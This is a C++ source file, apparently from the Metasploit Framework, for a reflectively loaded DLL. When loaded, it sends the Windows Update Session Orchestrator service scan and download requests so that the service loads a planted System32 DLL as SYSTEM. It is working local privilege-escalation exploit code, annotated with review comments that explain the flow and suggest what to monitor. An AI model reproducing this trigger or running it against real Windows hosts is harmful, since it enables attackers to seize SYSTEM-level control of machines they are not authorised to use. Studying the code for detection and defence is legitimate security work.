GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/uso_trigger/main.cpp
/*
* Update Session Orchestrator service DLL load trigger
*
* Author:
* itm4n
* References:
* - https://github.com/itm4n/UsoDllLoader
* - https://itm4n.github.io/usodllloader-part1/
* - https://itm4n.github.io/usodllloader-part2/
*
* Loading this DLL triggers the Update Session Orchestrator service, which then
* loads the DLL at C:\Windows\System32\WindowsCoreDeviceInfo.dll as
* NT AUTHORITY\SYSTEM. The "Windows Update" service must be running for this
* technique to work.
*/
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
#include "MiniUsoClient.h"
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <windows.h>
/**
 * Send three requests to the Update Session Orchestrator (USO) service through
 * MiniUsoClient, in this order: USO_STARTSCAN, USO_STARTINTERACTIVESCAN,
 * USO_STARTDOWNLOAD. The function sleeps 2000 ms after each of the first two
 * requests before issuing the next one.
 *
 * According to the file header, these requests are what prompt the service to
 * load C:\Windows\System32\WindowsCoreDeviceInfo.dll.
 *
 * NOTE(review): the requests carry nothing but an action constant, so the
 * effect described in the header depends on a DLL already being present at
 * that System32 path. Creation of that file and its subsequent load by the
 * service look like the events worth monitoring; confirm against the
 * referenced write-ups.
 *
 * @return TRUE when all three MiniUsoClient::Run calls succeed; FALSE as soon
 *         as one fails, in which case the remaining requests are not sent.
 */
BOOL trigger(void) {
    MiniUsoClient usoClient;
    const DWORD dwPauseMs = 2000;
    BOOL bAllAccepted = FALSE;

    // Each step is attempted only if the previous one succeeded; the pause
    // sits between consecutive requests, never after a failed one.
    if (usoClient.Run(USO_STARTSCAN)) {
        Sleep(dwPauseMs);

        if (usoClient.Run(USO_STARTINTERACTIVESCAN)) {
            Sleep(dwPauseMs);

            if (usoClient.Run(USO_STARTDOWNLOAD)) {
                bAllAccepted = TRUE;
            }
        }
    }

    return bAllAccepted;
}
/**
 * DLL entry point.
 *
 * - DLL_QUERY_HMODULE: records the module handle in hAppInstance and, when
 *   lpReserved is non-NULL, writes that handle through it as an HMODULE*.
 *   NOTE(review): this reason code is not one of the standard Windows
 *   notifications; it presumably comes from the included ReflectiveLoader
 *   sources (confirm there).
 * - DLL_PROCESS_ATTACH: records the module handle and calls trigger().
 * - Any other reason: nothing is done.
 *
 * @param hinstDLL   Module handle for this DLL.
 * @param dwReason   Reason code for the call.
 * @param lpReserved Output slot for the handle on DLL_QUERY_HMODULE; unused
 *                   otherwise.
 * @return Always TRUE. The result of trigger() is discarded, so a failed
 *         trigger is not reported to the caller.
 */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
    if (dwReason == DLL_QUERY_HMODULE) {
        hAppInstance = hinstDLL;
        if (lpReserved != NULL) {
            // Hand the stored handle back to the caller that asked for it.
            *(HMODULE*)lpReserved = hAppInstance;
        }
    } else if (dwReason == DLL_PROCESS_ATTACH) {
        hAppInstance = hinstDLL;
        // Return value intentionally not inspected, matching the original flow.
        trigger();
    }
    // DLL_PROCESS_DETACH, DLL_THREAD_ATTACH, DLL_THREAD_DETACH: no action.

    return TRUE;
}